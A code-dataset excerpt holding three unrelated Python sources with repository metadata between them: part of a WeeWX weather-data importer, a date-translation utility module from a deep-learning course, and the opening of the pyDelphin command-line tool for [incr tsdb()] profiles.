# there is no mapped field for dateTime so raise an error
raise ValueError("No mapping for WeeWX field 'dateTime'.")
# usUnits
_units = None
if 'field_name' in self.map['usUnits']:
# we have a field map for a unit system
try:
# The mapped field is in _row so try to get the raw data.
# If its not there then raise an error.
_raw_units = int(_row[self.map['usUnits']['field_name']])
except KeyError:
_msg = "Field '%s' not found in source data." % self.map['usUnits']['field_name']
raise WeeImportFieldError(_msg)
# we have a value but is it valid
if _raw_units in unit_nicknames:
# it is valid so use it
_units = _raw_units
else:
# the units value is not valid so raise an error
_msg = "Invalid unit system '%s'(0x%02x) mapped from data source. " \
"Check data source or field mapping." % (_raw_units,
_raw_units)
raise weewx.UnitError(_msg)
# interval
if 'field_name' in self.map['interval']:
# We have a map for interval so try to get the raw data. If
# its not there then raise an error.
try:
_tfield = _row[self.map['interval']['field_name']]
except KeyError:
_msg = "Field '%s' not found in source data." % self.map['interval']['field_name']
raise WeeImportFieldError(_msg)
# now process the raw interval data
if _tfield is not None and _tfield != '':
try:
interval = int(_tfield)
except ValueError:
_msg = "Invalid '%s' field. Cannot convert '%s' to " \
"an integer." % (self.map['interval']['field_name'],
_tfield)
raise ValueError(_msg)
else:
# if it happens to be None then raise an error
_msg = "Invalid value '%s' for mapped field '%s' at " \
"timestamp '%s'." % (_tfield,
self.map['interval']['field_name'],
timestamp_to_string(_rec['dateTime']))
raise ValueError(_msg)
else:
# we have no mapping so try to calculate it
interval = self.getInterval(_last_ts, _rec['dateTime'])
_rec['interval'] = interval
# now step through the rest of the fields in our map and process
# the fields that don't require special processing
for _field in self.map:
# skip those that have had special processing
if _field in MINIMUM_MAP:
continue
# process everything else
else:
# is our mapped field in the record
if self.map[_field]['field_name'] in _row:
# Yes it is. Try to get a value for the obs but if we
# can't catch the error
try:
_temp = float(_row[self.map[_field]['field_name']].strip())
except AttributeError:
# the data has no strip() attribute so chances are
# it's a number already
if isinstance(_row[self.map[_field]['field_name']], numbers.Number):
_temp = _row[self.map[_field]['field_name']]
elif _row[self.map[_field]['field_name']] is None:
_temp = None
else:
# it's not a string and its not a number so raise an error
_msg = "%s: cannot convert '%s' to float at " \
"timestamp '%s'." % (_field,
_row[self.map[_field]['field_name']],
timestamp_to_string(_rec['dateTime']))
raise ValueError(_msg)
except TypeError:
# perhaps we have a None, so return None for our field
_temp = None
except ValueError:
# most likely have non-numeric, non-None data
# if this is a csv import and we are mapping to a
# direction field perhaps we have a string
# representation of a cardinal, intercardinal or
# secondary intercardinal direction that we can
# convert to degrees
# set a flag to indicate whether we matched the data to a value
matched = False
if hasattr(self, 'wind_dir_map') and self.map[_field]['units'] == 'degree_compass':
# we have a csv import and we are mapping to a
# direction field
# first strip any whitespace and hyphens from
# the data
_stripped = re.sub(r'[\s-]+', '', _row[self.map[_field]['field_name']])
# try to use the data as the key in a dict
# mapping directions to degrees, if there is no
# match we will have None returned
dir_degrees = self.wind_dir_map.get(_stripped.upper())
# if we have a non-None value use it
if dir_degrees is not None:
_temp = dir_degrees
# we have a match so set our flag
matched = True
# if we did not get a match perhaps we can ignore
# the invalid data, that will depend on the
# ignore_invalid_data property
if not matched and self.ignore_invalid_data:
# we ignore the invalid data so set our result
# to None
_temp = None
# set our matched flag
matched = True
# if we did not find a match raise the error
if not matched:
_msg = "%s: cannot convert '%s' to float at " \
"timestamp '%s'." % (_field,
_row[self.map[_field]['field_name']],
timestamp_to_string(_rec['dateTime']))
raise ValueError(_msg)
# some fields need some special processing
# rain - if our imported 'rain' field is cumulative
# (self.rain == 'cumulative') then we need to calculate
# the discrete rainfall for this archive period
if _field == "rain" and self.rain == "cumulative":
_rain = self.getRain(_last_rain, _temp)
_last_rain = _temp
_temp = _rain
# wind - check any wind direction fields are within our
# bounds and convert to 0 to 360 range
if _field == "windDir" or _field == "windGustDir":
if _temp is not None and (self.wind_dir[0] <= _temp <= self.wind_dir[1]):
# normalise to 0 to 360
_temp %= 360
else:
# outside our bounds so set to None
_temp = None
# UV - if there was no UV sensor used to create the
# imported data then we need to set the imported value
# to None
if _field == 'UV' and not self.UV_sensor:
_temp = None
# solar radiation - if there was no solar radiation
# sensor used to create the imported data then we need
# to set the imported value to None
if _field == 'radiation' and not self.solar_sensor:
_temp = None
# check and ignore if required temperature and humidity
# values of 255.0 and greater
if self.ignore_extr_th \
and self.map[_field]['units'] in ['degree_C', 'degree_F', 'percent'] \
and _temp >= 255.0:
_temp = None
# if no mapped field for a unit system we have to do
# field by field unit conversions
if _units is None:
_temp_vt = ValueTuple(_temp,
self.map[_field]['units'],
weewx.units.obs_group_dict[_field])
_conv_vt = convertStd(_temp_vt, unit_sys)
_rec[_field] = _conv_vt.value
else:
# we do have a mapped field for a unit system so
# save the field in our record and continue, any
# unit conversion will be done in bulk later
_rec[_field] = _temp
else:
# No it's not. Set the field in our output to None
_rec[_field] = None
# now warn the user about this field if we have not
# already done so
if self.map[_field]['field_name'] not in _warned:
_msg = "Warning: Import field '%s' is mapped to WeeWX " \
"field '%s' but the" % (self.map[_field]['field_name'],
_field)
if not self.suppress:
print(_msg)
log.info(_msg)
_msg = " import field '%s' could not be found " \
"in one or more records." % self.map[_field]['field_name']
if not self.suppress:
print(_msg)
log.info(_msg)
_msg = " WeeWX field '%s' will be set to 'None' in these records." % _field
if not self.suppress:
print(_msg)
log.info(_msg)
# make sure we do this warning once only
_warned.append(self.map[_field]['field_name'])
# if we have a mapped field for a unit system with a valid value,
# then all we need do is set 'usUnits', bulk conversion is taken
# care of by saveToArchive()
if _units is not None:
# we have a mapped field for a unit system with a valid value
_rec['usUnits'] = _units
else:
# no mapped field for unit system but we have already converted
# any necessary fields on a field by field basis so all we need
# do is set 'usUnits', any bulk conversion will be taken care of
# by saveToArchive()
_rec['usUnits'] = unit_sys
# If interval is being derived from record timestamps our first
# record will have an interval of None. In this case we wait until
# we have the second record and then we use the interval between
# records 1 and 2 as the interval for record 1.
if len(_records) == 1 and _records[0]['interval'] is None:
_records[0]['interval'] = _rec['interval']
_last_ts = _rec['dateTime']
# this record is done, add it to our list of records to return
_records.append(_rec)
# If we have more than 1 unique value for interval in our records it
# could be a sign of missing data and impact the integrity of our data,
# so do the check and see if the user wants to continue
if len(_records) > 0:
# if we have any records to return do the unique interval check
# before we return the records
_start_interval = _records[0]['interval']
_diff_interval = False
for _rec in _records:
if _rec['interval'] != _start_interval:
_diff_interval = True
break
if _diff_interval and self.interval_ans != 'y':
# we had more than one unique value for interval, warn the user
_msg = "Warning: Records to be imported contain multiple " \
"different 'interval' values."
print(_msg)
log.info(_msg)
print(" This may mean the imported data is missing some records and it may lead")
print(" to data integrity issues. If the raw data has a known, fixed interval")
print(" value setting the relevant 'interval' setting in wee_import config to")
print(" this value may give a better result.")
while self.interval_ans not in ['y', 'n']:
if self.no_prompt:
self.interval_ans = 'y'
else:
self.interval_ans = input('Are you sure you want to proceed (y/n)? ')
if self.interval_ans == 'n':
# the user chose to abort, but we may have already
# processed some records. So log it then raise a SystemExit()
if self.dry_run:
print("Dry run import aborted by user. %d records were processed." % self.total_rec_proc)
else:
if self.total_rec_proc > 0:
print("Those records with a timestamp already in the archive will not have been")
print("imported. As the import was aborted before completion refer to the WeeWX log")
print("file to confirm which records were imported.")
raise SystemExit('Exiting.')
else:
print("Import aborted by user. No records saved to archive.")
_msg = "User chose to abort import. %d records were processed. " \
"Exiting." % self.total_rec_proc
log.info(_msg)
raise SystemExit('Exiting. Nothing done.')
_msg = "Mapped %d records." % len(_records)
if self.verbose:
print(_msg)
log.info(_msg)
# the user wants to continue or we have only one unique value for
# interval so return the records
return _records
else:
_msg = "Mapped 0 records."
if self.verbose:
print(_msg)
log.info(_msg)
# we have no records to return so return None
return None
def getInterval(self, last_ts, current_ts):
"""Determine an interval value for a record.
The interval field can be determined in one of the following ways:
- Derived from the raw data. The interval is calculated as the
difference between the timestamps of consecutive records rounded to
the nearest minute. In this case interval can change between
records if the records are not evenly spaced in time or if there
are missing records. This method is the default and is used when
the interval parameter in wee_import.conf is 'derive'.
- Read from weewx.conf. The interval value is read from the
archive_interval parameter in [StdArchive] in weewx.conf. In this
case interval may or may not be the same as the difference in time
between consecutive records. This method may be of use when the
import source has a known interval but may be missing a number of
records which makes deriving the interval from the imported data
problematic. This method is used when the interval parameter in
wee_import.conf is 'conf'.
Input parameters:
last_ts. timestamp of the previous record.
current_rain. timestamp of the current record.
Returns the interval (in minutes) for the current record.
"""
# did we have a number specified in wee_import.conf, if so use that
try:
return float(self.interval)
except ValueError:
pass
# how are we getting interval
if self.interval.lower() == 'conf':
# get interval from weewx.conf
return to_int(float(self.config_dict['StdArchive'].get('archive_interval')) / 60.0)
elif self.interval.lower() == 'derive':
# get interval from the timestamps of consecutive records
try:
_interval = int((current_ts - last_ts) / 60.0)
# but if _interval < 0 our records are not in date time order
if _interval < 0:
# so raise an error
_msg = "Cannot derive 'interval' for record timestamp: %s." % timestamp_to_string(current_ts)
print(_msg)
log.info(_msg)
raise ValueError("Raw data is not in ascending date time order.")
except TypeError:
_interval = None
return _interval
else:
# we don't know what to do so raise an error
_msg = "Cannot derive 'interval'. Unknown 'interval' setting in %s." % self.import_config_path
raise ValueError(_msg)
@staticmethod
def getRain(last_rain, current_rain):
"""Determine period rainfall from two cumulative rainfall values.
If the data source provides rainfall as a cumulative value then the
rainfall in a period is the simple difference between the two values.
But we need to take into account some special cases:
No last_rain value. Will occur for very first record or maybe in an
error condition. Need to return 0.0.
last_rain > current_rain. Occurs when rain counter was reset (maybe
daily or some other period). Need to return
current_rain.
current_rain is None. Could occur if imported rainfall value could not
be converted to a numeric and config option
ignore_invalid_data is set.
Input parameters:
last_rain. Previous rainfall total.
current_rain. Current rainfall total.
Returns the rainfall in the period.
"""
if last_rain is not None:
# we have a value for the previous period
if current_rain is not None and current_rain >= last_rain:
# just return the difference
return current_rain - last_rain
else:
# we are at a cumulative reset point or we current_rain is None,
# either way we just want current_rain
return current_rain
else:
# we have no previous rain value so return zero
return 0.0
def qc(self, data_dict, data_type):
""" Apply weewx.conf QC to a record.
If qc option is set in the import config file then apply any StdQC
min/max checks specified in weewx.conf.
Input parameters:
data_dict: A WeeWX compatible archive record.
Returns nothing. data_dict is modified directly with obs outside of QC
limits set to None.
"""
if self.apply_qc:
self.import_QC.apply_qc(data_dict, data_type=data_type)
def saveToArchive(self, archive, records):
""" Save records to the WeeWX archive.
Supports saving one or more records to archive. Each collection of
records is processed and saved to archive in transactions of
self.tranche records at a time.
if the import config file qc option was set quality checks on the
imported record are performed using the WeeWX StdQC configuration from
weewx.conf. Any missing derived observations are then added to the
archive record using the WeeWX WXCalculate class if the import config
file calc_missing option was set. WeeWX API addRecord() method is used
to add archive records.
If --dry-run was set then every aspect of the import is carried out but
nothing is saved to archive. If --dry-run was not set then the user is
requested to confirm the import before any records are saved to archive.
Input parameters:
archive: database manager object for the WeeWX archive.
records: iterable that provides WeeWX compatible archive records
(in dict form) to be written to archive
"""
# do we have any records?
if records and len(records) > 0:
# if this is the first period then give a little summary about what
# records we have
# TODO. Check that a single period shows correct and consistent console output
if self.first_period and self.last_period:
# there is only 1 period, so we can count them
print("%s records identified for import." % len(records))
# we do, confirm the user actually wants to save them
while self.ans not in ['y', 'n'] and not self.dry_run:
if self.no_prompt:
self.ans = 'y'
else:
print("Proceeding will save all imported records in the WeeWX archive.")
self.ans = input("Are you sure you want to proceed (y/n)? ")
if self.ans == 'y' or self.dry_run:
# we are going to save them
# reset record counter
nrecs = 0
# initialise our list of records for this tranche
_tranche = []
# initialise a set for use in our dry run, this lets us
# give some better stats on records imported
unique_set = set()
# step through each record in this period
for _rec in records:
# convert our record
_conv_rec = to_std_system(_rec, self.archive_unit_sys)
# perform any any required QC checks
self.qc(_conv_rec, 'Archive')
# add the record to our tranche and increment our count
_tranche.append(_conv_rec)
nrecs += 1
# if we have a full tranche then save to archive and reset
# the tranche
if len(_tranche) >= self.tranche:
# add the record only if it is not a dry run
if not self.dry_run:
# add the record only if it is not a dry run
archive.addRecord(_tranche)
# add our the dateTime for each record in our tranche
# to the dry run set
for _trec in _tranche:
unique_set.add(_trec['dateTime'])
# tell the user what we have done
_msg = "Unique records processed: %d; Last timestamp: %s\r" % (nrecs,
timestamp_to_string(_rec['dateTime']))
print(_msg, end='', file=sys.stdout)
sys.stdout.flush()
_tranche = []
# we have processed all records but do we have any records left
# in the tranche?
if len(_tranche) > 0:
# we do so process them
if not self.dry_run:
# add the record only if it is not a dry run
archive.addRecord(_tranche)
# add our the dateTime for each record in our tranche to
# the dry run set
for _trec in _tranche:
unique_set.add(_trec['dateTime'])
# tell the user what we have done
_msg = "Unique records processed: %d; Last timestamp: %s\r" % (nrecs,
timestamp_to_string(_rec['dateTime']))
print(_msg, end='', file=sys.stdout)
print()
sys.stdout.flush()
# update our counts
self.total_rec_proc += nrecs
self.total_unique_rec += len(unique_set)
# mention any duplicates we encountered
num_duplicates = len(self.period_duplicates)
self.total_duplicate_rec += num_duplicates
if num_duplicates > 0:
if num_duplicates == 1:
_msg = " 1 duplicate record was identified in period %d:" % self.period_no
else:
_msg = " %d duplicate records were identified in period %d:" % (num_duplicates,
self.period_no)
if not self.suppress:
print(_msg)
log.info(_msg)
for ts in sorted(self.period_duplicates):
_msg = " %s" % timestamp_to_string(ts)
if not self.suppress:
print(_msg)
log.info(_msg)
# add the period duplicates to the overall duplicates
self.duplicates |= self.period_duplicates
# reset the period duplicates
self.period_duplicates = set()
elif self.ans == 'n':
# user does not want to import so display a message and then
# ask to exit
_msg = "User chose not to import records. Exiting. Nothing done."
print(_msg)
log.info(_msg)
raise SystemExit('Exiting. Nothing done.')
else:
# we have no records to import, advise the user but what we say
# will depend if there are any more periods to import
if self.first_period and self.last_period:
# there was only 1 period
_msg = 'No records identified for import.'
else:
# multiple periods
_msg = 'Period %d - no records identified for import.' % self.period_no
print(_msg)
# if we have finished record the time taken for our summary
if self.last_period:
self.tdiff = time.time() - self.t1
# ============================================================================
# Utility functions
# ============================================================================
def get_binding(config_dict):
"""Get the binding for the WeeWX database."""
# Extract our binding from the StdArchive section of the config file. If
# it's missing, return None.
if 'StdArchive' in config_dict:
db_binding_wx = config_dict['StdArchive'].get('data_binding',
'wx_binding')
else:
db_binding_wx = None
return db_binding_wx
| [
"[email protected]"
] | |
928912bc219dbc93b8a5897d85c493b2348490a2 | 11492c36fc15375ca23d3ba4dfa042b16f873a68 | /notebooks/05-sequence-models/03-sequence-models-attention-mechanism/01-machine-translation/nmt_utils.py | c9cf015706d07f25662d65ff2d4ed24f788d475c | [
"Apache-2.0"
] | permissive | pedro-abundio-wang/deep-learning-specialization | c9bfe03c32275845dbef1a3d9268c337593ac146 | 47f4109eddae94c1ce978d63d7672972762ac815 | refs/heads/master | 2021-07-13T13:11:47.391704 | 2020-09-10T05:30:47 | 2020-09-10T05:30:47 | 203,183,384 | 0 | 0 | Apache-2.0 | 2019-11-04T11:53:50 | 2019-08-19T13:56:19 | Jupyter Notebook | UTF-8 | Python | false | false | 6,514 | py | import numpy as np
from faker import Faker
import random
from tqdm import tqdm
from babel.dates import format_date
from keras.utils import to_categorical
import keras.backend as K
import matplotlib.pyplot as plt
Faker.seed(12345)
fake = Faker()
random.seed(12345)
# Define format of the data we would like to generate
FORMATS = ['medium',
'long',
'full',
'd MM YYY',
'd MMM YYY',
'd MMMM YYY',
'd MMM, YYY',
'd MMMM, YYY',
'dd.MM.YYY',
'dd MMM YYY',
'dd, MMM YYY',
'MMMM d YYY',
'MMMM d, YYY']
# change this if you want it to work with another language
LOCALES = ['en_US']
def load_date():
"""
Loads some fake dates
:returns: tuple containing human readable string, machine readable string, and date object
"""
dt = fake.date_object()
try:
human_readable = format_date(dt, format=random.choice(FORMATS), locale='en_US') # locale=random.choice(LOCALES))
human_readable = human_readable.lower()
human_readable = human_readable.replace(',','')
machine_readable = dt.isoformat()
except AttributeError as e:
return None, None, None
return human_readable, machine_readable, dt
def load_dataset(m):
"""
Loads a dataset with m examples and vocabularies
:m: the number of examples to generate
"""
human_vocab = set()
machine_vocab = set()
dataset = []
Tx = 30
for i in tqdm(range(m)):
h, m, dt = load_date()
if h is not None:
dataset.append((h, m))
human_vocab.update(tuple(h))
machine_vocab.update(tuple(m))
human = dict(zip(sorted(human_vocab) + ['<unk>', '<pad>'],
list(range(len(human_vocab) + 2))))
inv_machine = dict(enumerate(sorted(machine_vocab)))
machine = {v:k for k,v in inv_machine.items()}
return dataset, human, machine, inv_machine
def preprocess_data(dataset, human_vocab, machine_vocab, Tx, Ty):
X, Y = zip(*dataset)
X = np.array([string_to_int(x, Tx, human_vocab) for x in X])
Y = np.array([string_to_int(y, Ty, machine_vocab) for y in Y])
Xoh = np.array(list(map(lambda x: to_categorical(x, num_classes=len(human_vocab)), X)))
Yoh = np.array(list(map(lambda y: to_categorical(y, num_classes=len(machine_vocab)), Y)))
return X, Y, Xoh, Yoh
def string_to_int(string, length, vocab):
"""
Converts all strings in the vocabulary into a list of integers representing the positions of the
input string's characters in the "vocab"
Arguments:
string -- input string, e.g. 'Wed 10 Jul 2007'
length -- the number of time steps you'd like, determines if the output will be padded or cut
vocab -- vocabulary, dictionary used to index every character of your "string"
Returns:
rep -- list of integers (or '<unk>') (size = length) representing the position of the string's character in the vocabulary
"""
# make lower to standardize
string = string.lower()
string = string.replace(',','')
if len(string) > length:
string = string[:length]
rep = list(map(lambda x: vocab.get(x, '<unk>'), string))
if len(string) < length:
rep += [vocab['<pad>']] * (length - len(string))
return rep
def int_to_string(ints, inv_vocab):
"""
Output a machine readable list of characters based on a list of indexes in the machine's vocabulary
Arguments:
ints -- list of integers representing indexes in the machine's vocabulary
inv_vocab -- dictionary mapping machine readable indexes to machine readable characters
Returns:
l -- list of characters corresponding to the indexes of ints thanks to the inv_vocab mapping
"""
l = [inv_vocab[i] for i in ints]
return l
def softmax(x, axis=1):
"""Softmax activation function.
# Arguments
x : Tensor.
axis: Integer, axis along which the softmax normalization is applied.
# Returns
Tensor, output of softmax transformation.
# Raises
ValueError: In case `dim(x) == 1`.
"""
ndim = K.ndim(x)
if ndim == 2:
return K.softmax(x)
elif ndim > 2:
e = K.exp(x - K.max(x, axis=axis, keepdims=True))
s = K.sum(e, axis=axis, keepdims=True)
return e / s
else:
raise ValueError('Cannot apply softmax to a tensor that is 1D')
def plot_attention_map(model, input_vocabulary, inv_output_vocabulary, text, n_s = 128, num = 6, Tx = 30, Ty = 10):
"""
Plot the attention map.
"""
attention_map = np.zeros((10, 30))
Ty, Tx = attention_map.shape
s0 = np.zeros((1, n_s))
c0 = np.zeros((1, n_s))
layer = model.layers[num]
encoded = np.array(string_to_int(text, Tx, input_vocabulary)).reshape((1, 30))
encoded = np.array(list(map(lambda x: to_categorical(x, num_classes=len(input_vocabulary)), encoded)))
f = K.function(model.inputs, [layer.get_output_at(t) for t in range(Ty)])
r = f([encoded, s0, c0])
for t in range(Ty):
for t_prime in range(Tx):
attention_map[t][t_prime] = r[t][0,t_prime,0]
prediction = model.predict([encoded, s0, c0])
predicted_text = []
for i in range(len(prediction)):
predicted_text.append(int(np.argmax(prediction[i], axis=1)))
predicted_text = list(predicted_text)
predicted_text = int_to_string(predicted_text, inv_output_vocabulary)
text_ = list(text)
# get the lengths of the string
input_length = len(text)
output_length = Ty
# Plot the attention_map
plt.clf()
f = plt.figure(figsize=(8, 8.5))
ax = f.add_subplot(1, 1, 1)
# add image
i = ax.imshow(attention_map, interpolation='nearest', cmap='Blues')
# add colorbar
cbaxes = f.add_axes([0.2, 0, 0.6, 0.03])
cbar = f.colorbar(i, cax=cbaxes, orientation='horizontal')
cbar.ax.set_xlabel('Alpha value (Probability output of the "softmax")', labelpad=2)
# add labels
ax.set_yticks(range(output_length))
ax.set_yticklabels(predicted_text[:output_length])
ax.set_xticks(range(input_length))
ax.set_xticklabels(text_[:input_length], rotation=45)
ax.set_xlabel('Input Sequence')
ax.set_ylabel('Output Sequence')
# add grid and legend
ax.grid()
f.show()
return attention_map | [
"[email protected]"
] | |
53cbe1480bc73311da9403ad7b06b8861aeedb17 | fd8e7e196f0bcadf28243ce5108f00b9de956dc5 | /pyDelphin | c3c8d7ed0ec5b975e63bdcebf95d37ad552c057e | [
"MIT"
] | permissive | Yoonsen/pydelphin | a5c9ed2ca22c60ed942eace9ccba12560c8be12e | 08e000f4bc55c46b607595aee7e1bcc2d5b658c1 | refs/heads/master | 2020-04-29T17:32:43.800827 | 2015-08-25T06:18:19 | 2015-08-25T06:18:19 | 47,044,673 | 1 | 0 | null | 2015-11-29T00:37:21 | 2015-11-29T00:37:21 | null | UTF-8 | Python | false | false | 15,633 | #!/usr/bin/env python3
import sys
import os
import argparse
import logging
import json
import re
from collections import OrderedDict
from copy import deepcopy
from importlib import import_module
from delphin import itsdb, mrs
_rcfilename = '.pydelphinrc'
def main(args):
cfg = load_config(args)
args.func(args, cfg)
def select(args, cfg):
in_profile = prepare_input_profile(cfg['input'],
filters=cfg.get('filters'),
applicators=cfg.get('applicators'))
keyfilter = cfg['cascade_filters']
if args.join:
rows = in_profile.join(*args.join, key_filter=keyfilter)
# Adding : is just for robustness. We need something like
# :table:col@table@col, but may have gotten table:col@table@col
if not args.select.startswith(':'):
args.select = ':' + args.select
table, cols = itsdb.get_data_specifier(args.select)
else:
table, cols = itsdb.get_data_specifier(args.select)
rows = in_profile.read_table(table, key_filter=keyfilter)
for row in itsdb.select_rows(cols, rows, mode='row'):
print(row)
def mkprof(args, cfg):
in_profile = prepare_input_profile(cfg['input'],
filters=cfg.get('filters'),
applicators=cfg.get('applicators'))
outdir = args.output
# copy relations file
relations = None
if hasattr(args, 'relations') and args.relations is not None:
relations = args.relations
elif hasattr(args, 'input'):
rel_fn = cfg.get('itsdb_relations_filename', 'relations')
relations = os.path.join(args.input, rel_fn)
assert(os.path.isfile(relations))
if args.skeleton:
rows = in_profile.read_table('item', key_filter=cfg['cascade_filters'])
itsdb.make_skeleton(outdir, relations, rows)
else:
prepare_output_directory(outdir, cfg)
in_profile.write_profile(outdir,
relations_filename=relations,
key_filter=cfg['cascade_filters'])
prof = itsdb.ItsdbProfile(outdir, index=False)
return prof
def compare(args, cfg):
from delphin.mrs.compare import compare_bags
from delphin.mrs import simplemrs
test_profile = prepare_input_profile(cfg['input'],
filters=cfg.get('filters'),
applicators=cfg.get('applicators'))
gold_profile = prepare_input_profile(args.gold)
matched_rows = itsdb.match_rows(
test_profile.read_table('result'),
gold_profile.read_table('result'),
'parse-id'
)
for (key, testrows, goldrows) in matched_rows:
(test_unique, shared, gold_unique) = compare_bags(
[simplemrs.loads_one(row['mrs']) for row in testrows],
[simplemrs.loads_one(row['mrs']) for row in goldrows]
)
print('{}\t<{},{},{}>'.format(key, test_unique, shared, gold_unique))
def load_config(args):
"""
Load a configuration file. Configurations may be loaded from 3 places. In
order of precedence:
1. the argument of the -c (--config) option
2. a .pydelphinrc file in the current directory
3. a .pydelphinrc file in the $HOME directory
Only one of the above may be loaded. Additionally, configuration options
given explicitly at the command line override any loaded values.
"""
if args.config is not None:
if not os.path.exists(args.config):
sys.exit('Config file not found: {}'.format(args.config))
# will be loaded below
elif os.path.exists(os.path.join(os.getcwd(), _rcfilename)):
args.config = os.path.join(os.getcwd(), _rcfilename)
elif os.path.exists(os.path.join(os.environ['HOME'], _rcfilename)):
args.config = os.path.join(os.environ['HOME'], _rcfilename)
else:
sys.exit('No config file found. Exiting.')
logging.debug('Loading the config file found at {}'.format(args.config))
with open(args.config, 'r') as config:
cfg = json.loads(strip_json_comments(config),
object_pairs_hook=OrderedDict)
# override the loaded values with those from the command-line
cfg.update({
'verbosity': args.verbosity,
'input': args.input or cfg.get('input'),
#'output': args.output or cfg.get('output'),
#'relations': args.relations or cfg.get('relations'),
#'select': args.select or cfg.get('select'),
'applicators': args.applicators or cfg.get('applicators', []),
'filters': args.filters or cfg.get('filters', []),
'cascade_filters': args.cascade_filters or
cfg.get('cascade_filters', False)
})
# if relations is still unset, try to get from input
# if not cfg.get('relations') and cfg.get('input'):
# try:
# rel_fn = config['itsdb']['relations_filename']
# except KeyError:
# rel_fn = 'relations'
# in_rel_path = os.path.join(cfg['input'], rel_fn)
# if os.path.isfile(in_rel_path):
# cfg['relations'] = in_rel_path
# these overrides need some nesting, so do them separate
# if 'variables' not in cfg:
# cfg['variables'] = {}
# if args.source_grammar:
# cfg['variables']['source_grammar'] = args.source_grammar
# if args.transfer_grammar:
# cfg['variables']['transfer_grammar'] = args.transfer_grammar
# if args.target_grammar:
# cfg['variables']['target_grammar'] = args.target_grammar
# if args.grammar:
# cfg['variables']['grammar'] = args.grammar
return cfg
json_single_comment_re = re.compile(r'^\s*//')
json_start_comment_re = re.compile(r'^\s*/\*')
json_end_comment_re = re.compile(r'\*/\s*$')
def strip_json_comments(fh):
in_comment = False
lines = []
for line in fh:
if in_comment:
if json_end_comment_re.search(line):
in_comment = False
elif json_start_comment_re.match(line):
in_comment = True
elif not json_single_comment_re.match(line):
lines.append(line)
return ''.join(lines)
def validate(args, cfg):
""" Validate arguments not caught by argparse. """
# if args.list:
# return True
valid = True
#if len(args.commands) == 0:
# logging.error('At least one command is required.')
# valid = False
#if args.output is None:
# logging.error('An --output argument is required.')
# valid = False
if args.input is None:
logging.error('An --input argument is required.')
valid = False
relations = cfg.get('relations')
if relations:
if not os.path.isfile(cfg['relations']):
logging.error('Relations file not found: {}'.format(relations))
valid = False
elif args.output and not args.input:
logging.error('No relations file found for the output profile.')
valid = False
return valid
def prepare_input_profile(path, filters=None, applicators=None):
filters = [make_itsdb_action(ds, f) for ds, f in (filters or [])]
applicators = [make_itsdb_action(ds, f) for ds, f in (applicators or [])]
index = len(filters) > 0
prof = itsdb.ItsdbProfile(path,
filters=filters,
applicators=applicators,
index=index)
return prof
def prepare_output_directory(path, config):
try:
os.makedirs(path, exist_ok=True)
except PermissionError:
logging.critical('Permission denied to create output directory: {}'
.format(path))
sys.exit(1)
if not os.access(path, os.R_OK|os.W_OK):
logging.critical('Cannot write to output directory: {}'
.format(path))
sys.exit(1)
# copy configuration for documentation
# TODO: allow for multiple configs in same directory (e.g. (PID).rcfile)
rcpath = os.path.join(path, _rcfilename)
if not os.path.exists(rcpath):
with open(rcpath, 'w') as config_file:
json.dump(config, config_file, indent=2)
else:
logging.warning('Config file path already exists: {}'.format(rcpath))
def list_commands(config):
print('Commands:')
for c, cmd in config['commands'].items():
print(' {}: {}'.format(c, cmd.get('description')))
def make_command(command, cfg):
# make a copy so changes for this command do not affect later ones
cmd = deepcopy(cfg['commands'][command])
cpu_name = cmd['cpu']
cpu = cfg['cpus'][cpu_name]
task_name = cmd['task']
task = cpu['tasks'][task_name]
cmd['executable'] = cpu['executable']
cmd['arguments'] = cpu.get('arguments', []) + task.get('arguments', [])
cmd['interface'] = cpu.get('interface', 'generic')
# if grammar is given explicitly, use it, otherwise use
# task-specific grammar (already in the command)
if cfg.get('grammar'):
cmd['grammar'] = cfg['grammar']
return cmd
def get_interface(interface_name):
return import_module('{}.{}'.format('delphin.interfaces', interface_name))
def make_itsdb_action(data_specifier, function):
table, cols = itsdb.get_data_specifier(data_specifier)
function = make_lambda_function(function)
return (table, cols, function)
def make_lambda_function(function):
return eval('lambda row, x:{}'.format(function))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description='''
DATA SPECIFIERS
The --select, --apply, and --filter options take as a first argument
a string to specify the table and, if desired or necessary, the column
from a [incr tsdb()] profile to draw data from. These take the form:
TABLE[:COL[@COL..]]
For example, this selects an entire row from the `item` table:
item
while this selects the `i-id` and `i-input` columns for each row:
item:i-id@i-input
For --select and --filter, the COL specifiers are optional. For
--apply, at least one COL is required.
FILTER/APPLY EXPRESSIONS
The --filter and --apply options take as a second argument a small
Python expression to be evaluated. This expression is turned into a
lambda expression like this:
f = lambda row, x: EXPR
Thus, EXPR can use `row`, which is the contents of the entire row as a
Python dictionary, and `x` is the value of the current column (if COLs
are specified, otherwise it is None). The type of `x` is a string for
--apply, and it will be a string for --filter unless an --apply
operation has recast it. For example, these are equivalent and select
all rows in `item` where the `i-id` field has an integer value less
than 10:
--filter item "int(row['i-id']) < 10"
--filter item:i-id "int(x) < 10"
--apply item:i-id "int(x)" --filter item:i-id "x < 10"
Note, however, that the last one with the --apply operation differs in
that the value of `item:i-id` remains an `int` after the filtering.
'''
)
add = parser.add_argument
add('-c', '--config',
metavar='CFG',
help='The configuration file describing possible commands.')
# the --list option is a specific kind of help that uses the config.
# When it is not used, --outdir and a command are required, but we
# can't use argparse to state the requirement (validate later)
#add('-l', '--list',
# action='store_true',
# help='List the commands allowed by the configuration.')
add('-v', '--verbose',
action='count', dest='verbosity', default=2,
help='Increase the verbosity (can be repeated: -vvv).')
add('-q', '--quiet',
action='store_const', const=0, dest='verbosity',
help='Set verbosity to the quietest level.')
add('-i', '--input',
metavar='PATH',
help='The [incr tsdb()] profile to use as input.')
add('-a', '--apply',
nargs=2, metavar=('TBL:COL[@COL..]', 'EXPR'),
action='append', dest='applicators',
help='Apply EXPR to the contents of COL for each COL for each row '
'in TBL. See also the section about DATA SPECIFIERS and '
'FILTER/APPLY EXPRESSIONS. e.g. '
'--apply result:mrs "mrs.convert(x, \'mrx\', \'dmrx\')"')
add('-f', '--filter',
nargs=2, metavar=('TBL[:COL[@COL..]]', 'EXPR'),
action='append', dest='filters',
help='Ignore rows where EXPR returns a non-true value. TBL restricts '
'the filter to rows of that table. Specifying COLs makes the '
'filter run for each COL, but only if the COL exists in the '
'table. It is an error if neither TBL nor COLs are specified. '
'See also the section about DATA SPECIFIERS and FILTER/APPLY '
'EXPRESSIONS. Filters do not cascade by default (See '
'--cascade-filters). e.g. '
'--filter item "int(row[\'i-length\']) < 5"')
add('--cascade-filters',
